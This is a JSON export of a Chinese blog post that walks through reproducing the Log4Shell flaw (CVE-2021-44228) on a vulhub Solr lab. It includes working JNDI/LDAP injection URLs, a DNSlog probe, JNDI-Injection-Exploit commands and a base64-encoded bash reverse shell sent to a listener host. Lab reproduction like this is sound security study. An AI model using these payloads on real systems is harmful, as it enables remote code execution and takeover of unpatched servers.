{"id":1130,"date":"2022-12-05T10:23:30","date_gmt":"2022-12-05T02:23:30","guid":{"rendered":"https:\/\/blog.langsasec.cn\/?p=1130"},"modified":"2022-12-05T10:23:30","modified_gmt":"2022-12-05T02:23:30","slug":"cve-2021-44228%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0","status":"publish","type":"post","link":"https:\/\/blog.langsasec.cn\/index.php\/2022\/12\/05\/cve-2021-44228%e6%bc%8f%e6%b4%9e%e5%a4%8d%e7%8e%b0\/","title":{"rendered":"CVE-2021-44228\u6f0f\u6d1e\u590d\u73b0"},"content":{"rendered":"

<\/span>\u6f0f\u6d1e\u6982\u8ff0<\/span><\/h2>\n

Apche log4j\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u5c31\u662f\u53bb\u5e74\u6740\u75af\u4e86\u7684log4j\u6f0f\u6d1e\u3002apache log4j\u901a\u8fc7\u5b9a\u4e49\u6bcf\u4e00\u6761\u65e5\u5fd7\u4fe1\u606f\u7684\u7ea7\u522b\u80fd\u591f\u66f4\u52a0\u7ec6\u81f4\u5730\u63a7\u5236\u65e5\u5fd7\u751f\u6210\u5730\u8fc7\u7a0b\uff0c\u53d7\u5f71\u54cd\u5730\u7248\u672c\u4e2d\u7eaf\u5728JNDI\u6ce8\u5165\u6f0f\u6d1e\uff0c\u5bfc\u81f4\u65e5\u5fd7\u5728\u8bb0\u5f55\u7528\u6237\u8f93\u5165\u5730\u6570\u636e\u65f6\uff0c\u89e6\u53d1\u4e86\u6ce8\u5165\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u53ef\u5bfc\u81f4\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\uff0c\u4e14\u5229\u7528\u6761\u4ef6\u4f4e\uff0c\u5f71\u54cd\u8303\u56f4\u5e7f\uff0c\u5c0f\u5230\u7f51\u7ad9\uff0c\u5927\u5230\u53ef\u8054\u7f51\u7684\u8f66\u90fd\u53d7\u5f71\u54cd\u3002<\/p>\n

<\/span>\u9776\u573a\u73af\u5883<\/span><\/h2>\n

<\/span>vulhub\u642d\u5efa\u53c2\u8003\uff1a<\/span><\/h3>\n
\n

Vulnhub \u9776\u573a\u73af\u5883\u642d\u5efa<\/a><\/p>\n<\/blockquote>\n

\u8fdb\u5165\u5230vulbub\u9776\u573a\u7684\/vulhub\/log4j\/CVE-2021-44228\u76ee\u5f55<\/p>\n

\u4f7f\u7528\u547d\u4ee4\uff1adocker-compose up -d #\u542f\u52a8\u955c\u50cf\uff0c\u6574\u4e2a\u8fc7\u7a0b\u6bd4\u8f83\u4e45\uff0c\u8010\u5fc3\u7b49\u5f85<\/p>\n

\u8bbf\u95ee http:\/\/yourip:8983\/solr\/<\/a>#\/ \u6210\u529f\u8bbf\u95ee\u5230\u9875\u9762\uff0c\u642d\u5efa\u6210\u529f<\/p>\n

\"image-20221121091205651\"<\/p>\n

<\/span>\u9a8c\u8bc1\u6f0f\u6d1e\u7684\u5b58\u5728<\/span><\/h2>\n

\u4f7f\u7528ceye\u5e73\u53f0\u63a5\u6536dnslog\u4fe1\u606f<\/p>\n

\u5e73\u53f0\u94fe\u63a5\uff1ahttp:\/\/ceye.io\/<\/a><\/p>\n

http:\/\/192.168.0.140:8983\/solr\/admin\/cores?action=$<\/a>{jndi:ldap:\/\/${sys:java.version}.xxxxx.ceye.io<\/a>}<\/p>\n

\"image-20221121091229003\"<\/p>\n

\u83b7\u53d6\u5230java\u7684\u7248\u672c\uff0c\u8bc1\u660e\u6f0f\u6d1e\u5b58\u5728<\/p>\n

<\/span>\u547d\u4ee4\u6267\u884c<\/span><\/h2>\n

\uff081\uff09\u5229\u7528JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar\u5de5\u5177\u521b\u5efasuccess\u6587\u4ef6<\/p>\n

\u6267\u884cjava -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch \/tmp\/success" -A 192.168.0.1<\/p>\n

\"image-20221121091259543\"<\/p>\n

\uff082\uff09\u6839\u636e\u63d0\u793a\u7684\u94fe\u63a5\uff0c\u53bb\u6784\u9020\u94fe\u63a5<\/p>\n

http:\/\/192.168.0.140:8983\/solr\/admin\/cores?action=$<\/a>{jndi:ldap:\/\/192.168.0.1:1389\/yp1nns<\/a>}<\/p>\n

\uff083\uff09\u6210\u529f\u521b\u5efasuccess\u6587\u4ef6<\/p>\n

\"image-20221121091427854\"<\/p>\n

<\/span>\u53cd\u5f39shell<\/span><\/h2>\n

\uff081\uff09\u5f00\u542f\u76d1\u542c\u7aef\u53e3<\/p>\n

nc.exe -lvvp 9999<\/p>\n

\uff082\uff09\u4f7f\u7528\u5de5\u5177\u6784\u9020\u53cd\u5f39shell<\/p>\n

bash -i >& \/dev\/tcp\/192.168.0.1\/9999 0>&1 -> YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS85OTk5IDA+JjEg #base64\u7f16\u7801<\/p>\n

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS85OTk5IDA+JjEg}|{base64,-d}|{bash,-i}" -A "192.168.0.1"<\/p>\n

\"image-20221121091321331\"<\/p>\n

\u6839\u636e\u63d0\u793a\u7684\u94fe\u63a5\uff0c\u53bb\u6784\u9020\u94fe\u63a5<\/p>\n

http:\/\/192.168.0.140:8983\/solr\/admin\/cores?action=$<\/a>{jndi:ldap:\/\/192.168.0.1:1389\/bwrcmp<\/a>}<\/p>\n

\u6216<\/p>\n

http:\/\/192.168.0.140:8983\/solr\/admin\/cores?action=$<\/a>{jndi:ldap:\/\/192.168.0.1:1389\/ymdqtj<\/a>}<\/p>\n

\u5747\u53ef<\/p>\n

\u7136\u540e\u7b49\u5f85\u7247\u523b\uff0c\u53cd\u5f39\u6210\u529f<\/p>\n

\"image-20221121091331763\"<\/p>\n

<\/span>\u83b7\u53d6exp<\/span><\/h2>\n
\n

\u5173\u6ce8\u6d6a\u98d2sec\u56de\u590d221122<\/code>\u83b7\u53d6exp\u4e0b\u8f7d\u5730\u5740<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"

\u6f0f\u6d1e\u6982\u8ff0 Apche log4j\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u8be5\u6f0f\u6d1e\u5c31\u662f\u53bb\u5e74\u6740\u75af\u4e86\u7684log4j\u6f0f\u6d1e\u3002apache log4 […]<\/p>\n","protected":false},"author":5,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[34],"tags":[],"class_list":["post-1130","post","type-post","status-publish","format-standard","hentry","category-vulfx"],"_links":{"self":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1130","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/comments?post=1130"}],"version-history":[{"count":1,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1130\/revisions"}],"predecessor-version":[{"id":1131,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/posts\/1130\/revisions\/1131"}],"wp:attachment":[{"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/media?parent=1130"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/categories?post=1130"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.langsasec.cn\/index.php\/wp-json\/wp\/v2\/tags?post=1130"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}